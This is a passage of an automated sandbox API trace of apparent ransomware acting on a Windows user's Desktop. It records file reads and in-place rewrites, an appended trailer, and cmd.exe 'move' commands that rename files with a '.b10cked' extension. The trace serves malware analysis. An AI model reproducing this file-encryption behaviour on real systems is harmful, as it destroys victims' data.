cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.721] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.721] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.721] ReleaseMutex (hMutex=0xf8) returned 1 [0219.721] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav" (normalized: "c:\\users\\eebsym5\\desktop\\bwuwh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.721] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27651067758) returned 1 [0219.721] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.722] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xeecc [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.723] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xe9e4 [0219.723] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xeecc [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xeecc [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.724] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7765, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7765, lpOverlapped=0x0) returned 1 [0219.724] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.724] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7765, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7765, lpOverlapped=0x0) returned 1 [0219.725] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-30565, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7767 [0219.725] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7765, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7765, lpOverlapped=0x0) returned 1 [0219.725] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-30565, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7767 [0219.725] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7765, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7765, lpOverlapped=0x0) returned 1 [0219.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bwuwh.wav", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0219.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bwuwh.wav", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bwuwh.wav", lpUsedDefaultChar=0x0) returned 9 [0219.729] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xeecc [0219.729] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.729] CloseHandle (hObject=0x1b4) returned 1 [0219.730] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav") returned 0x22 [0219.730] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.730] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe58, dwThreadId=0xed4)) returned 1 [0219.737] CloseHandle (hObject=0x120) returned 1 [0219.737] CloseHandle (hObject=0x1b4) returned 1 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.737] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.737] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.737] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.737] ReleaseMutex (hMutex=0xf8) returned 1 [0219.738] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.738] ReleaseMutex (hMutex=0xf8) returned 1 [0219.738] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27652709148) returned 1 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.738] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1835d [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.739] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17e75 [0219.739] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1835d [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1835d [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.740] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.740] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc1ad, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.741] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.741] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc1ad, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.741] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49581, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc1b0 [0219.741] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xc1ad, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.742] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49581, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc1b0 [0219.742] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xc1ad, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xc1ad, lpOverlapped=0x0) returned 1 [0219.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CKLvAyoW1loaz.flv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CKLvAyoW1loaz.flv", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 